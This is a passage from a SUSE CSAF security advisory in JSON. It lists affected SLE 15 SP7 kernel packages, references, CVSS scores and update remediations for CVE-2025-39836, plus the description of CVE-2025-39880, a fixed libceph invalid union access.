"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39836",
"url": "https://www.suse.com/security/cve/CVE-2025-39836"
},
{
"category": "external",
"summary": "SUSE Bug 1249904 for CVE-2025-39836",
"url": "https://bugzilla.suse.com/1249904"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-39836"
},
{
"cve": "CVE-2025-39880",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39880"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix invalid accesses to ceph_connection_v1_info\n\nThere is a place where generic code in messenger.c is reading and\nanother place where it is writing to con-\u003ev1 union member without\nchecking that the union member is active (i.e. msgr1 is in use).\n\nOn 64-bit systems, con-\u003ev1.auth_retry overlaps with con-\u003ev2.out_iter,\nso such a read is almost guaranteed to return a bogus value instead of\n0 when msgr2 is in use. This ends up being fairly benign because the\nside effect is just the invalidation of the authorizer and successive\nfetching of new tickets.\n\ncon-\u003ev1.connect_seq overlaps with con-\u003ev2.conn_bufs and the fact that\nit\u0027s being written to can cause more serious consequences, but luckily\nit\u0027s not something that happens often.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39880",
"url": "https://www.suse.com/security/cve/CVE-2025-39880"
},
{
"category": "external",
"summary": "SUSE Bug 1250388 for CVE-2025-39880",
"url": "https://bugzilla.suse.com/1250388"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
